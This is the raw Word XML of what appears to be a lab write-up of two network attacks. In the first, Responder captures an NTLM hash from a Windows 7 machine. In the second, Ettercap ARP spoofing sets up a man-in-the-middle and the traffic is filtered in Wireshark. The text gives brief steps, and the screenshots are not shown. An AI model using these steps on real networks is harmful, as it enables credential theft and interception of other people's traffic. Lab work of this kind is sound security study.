    <w:p w14:paraId="6ED39A5C" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="46D5BA20" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="10523D76" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="3E0C978F" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="041F0B91" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="360B5926" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="6C67C55E" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="640B9AB0" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="2C3A2F60" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="4F383CC2" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="3B7FB1DF" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00696472" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="2CD79839" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="65F77EDF" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="62CB2BBE" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="275A0618" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="5CD6FB8C" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="61C684DD" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="43A89A0A" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="362A4AE0" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="0F8733AB" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="50D5D4C0" w14:textId="7659D69D" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC4853">
        <w:t>Start Responder</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364FBB58" w14:textId="1BADD1E4" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:r w:rsidRPr="004758BB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01ECB440" wp14:editId="4E2838AE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3553321" cy="838317"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2084232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32869" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3553321" cy="838317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD2E088" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="004758BB" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="53FC98C6" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="1857FDDC" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="1A77C1C3" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="62721603" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="5CECA6C8" w14:textId="77777777" w:rsidR="0057482B" w:rsidRPr="004758BB" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="1C7DB5D4" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="1DB54DF3" w14:textId="06894CCD" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Trigger authentication, by entering the below in Windows 7 machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7C2524" w14:textId="68906541" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:r w:rsidRPr="00FC051C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50D9D8BB" wp14:editId="209C119D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7951</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3477110" cy="419158"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="317550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550712" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3477110" cy="419158"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9A2F4" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="5B7FECCD" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="4EDD526A" w14:textId="7E944634" w:rsidR="00410B43" w:rsidRDefault="003F73AB" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="037D4323" wp14:editId="75BB1B66">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5732890" cy="626731"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="804202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202609" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId56">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="56120"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5732890" cy="62673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10B43">
        <w:t>NTLM hash captured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF9C4E" w14:textId="634F91AB" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="3B0C101D" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00A70682" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="58D2EFB7" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="6EEC2379" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="2F432EC0" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="3F654B79" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D87252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MitM Attack using Ettercap (ARP Spoofing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0D44FD" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D331ED">
        <w:t>Launch Ettercap</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141C6432" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:r w:rsidRPr="00EE0903">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="503BA420" wp14:editId="1B1448C1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2172003" cy="495369"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1456361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61021" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2172003" cy="495369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="203C942E" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="4F0D5D29" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="4EBBCD6D" w14:textId="48C31AA8" w:rsidR="00410B43" w:rsidRDefault="0057482B" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00786DDA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7437C184" wp14:editId="7FE26E14">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>276225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2905125" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="1595950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950410" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2905125" cy="1285875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00410B43">
        <w:t>Add the target as Windows 7 and router Ip address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4BF25" w14:textId="0155845A" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="37E59B2D" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00E332E5" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="7E7ED1AE" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00E332E5" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="623EF339" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00E332E5" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="2405CB05" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="0D4A3538" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="72E853DF" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="55E68A7F" w14:textId="2C135694" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="6989C9CA" w14:textId="09E0F358" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Start MITM attack, by clicking ok.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F2797" w14:textId="7CED2A8D" w:rsidR="00410B43" w:rsidRDefault="0057482B" w:rsidP="00410B43">
      <w:r w:rsidRPr="00786DDA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C5C3C5D" wp14:editId="2D750116">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4381169" cy="2565043"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
            <wp:wrapNone/>
            <wp:docPr id="39790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90205" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4381169" cy="2565043"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6ECA8F" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00B00C3F" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="2B5DAFB6" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00B00C3F" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="442A91FD" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00B00C3F" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="302F6B95" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00B00C3F" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="263EF059" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00B00C3F" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="5797492B" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="244E97A5" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="366EFE68" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="5B0F03EB" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="71D49179" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="0FDD469D" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="64A5A2DF" w14:textId="77777777" w:rsidR="0057482B" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="0B4C22BA" w14:textId="77777777" w:rsidR="0057482B" w:rsidRPr="00B00C3F" w:rsidRDefault="0057482B" w:rsidP="00410B43"/>
    <w:p w14:paraId="61DED15C" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00B00C3F" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="3C128EFD" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00B00C3F" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="2F044E36" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="53394056" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Open Wireshark in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56661176" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:r w:rsidRPr="00B50990">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EEE46FB" wp14:editId="7D175D90">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>118635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3543795" cy="752580"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="1990039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039629" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3543795" cy="752580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B8BD20" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00B50990" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="5E3C459F" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="6F3F8A03" w14:textId="77777777" w:rsidR="001D0D39" w:rsidRDefault="001D0D39" w:rsidP="00410B43"/>
    <w:p w14:paraId="24D25B94" w14:textId="77777777" w:rsidR="001D0D39" w:rsidRPr="00B50990" w:rsidRDefault="001D0D39" w:rsidP="00410B43"/>
    <w:p w14:paraId="4947CC2A" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="62703435" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Useful traffic filtered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058FC400" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:r w:rsidRPr="00821764">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71F340D9" wp14:editId="509E7DE2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5736866" cy="633139"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="693138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138836" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5736866" cy="633139"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="775EF94E" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="44C18FAC" w14:textId="77777777" w:rsidR="001D0D39" w:rsidRDefault="001D0D39" w:rsidP="00410B43"/>
    <w:p w14:paraId="45C9FBB5" w14:textId="77777777" w:rsidR="001D0D39" w:rsidRPr="00821764" w:rsidRDefault="001D0D39" w:rsidP="00410B43"/>
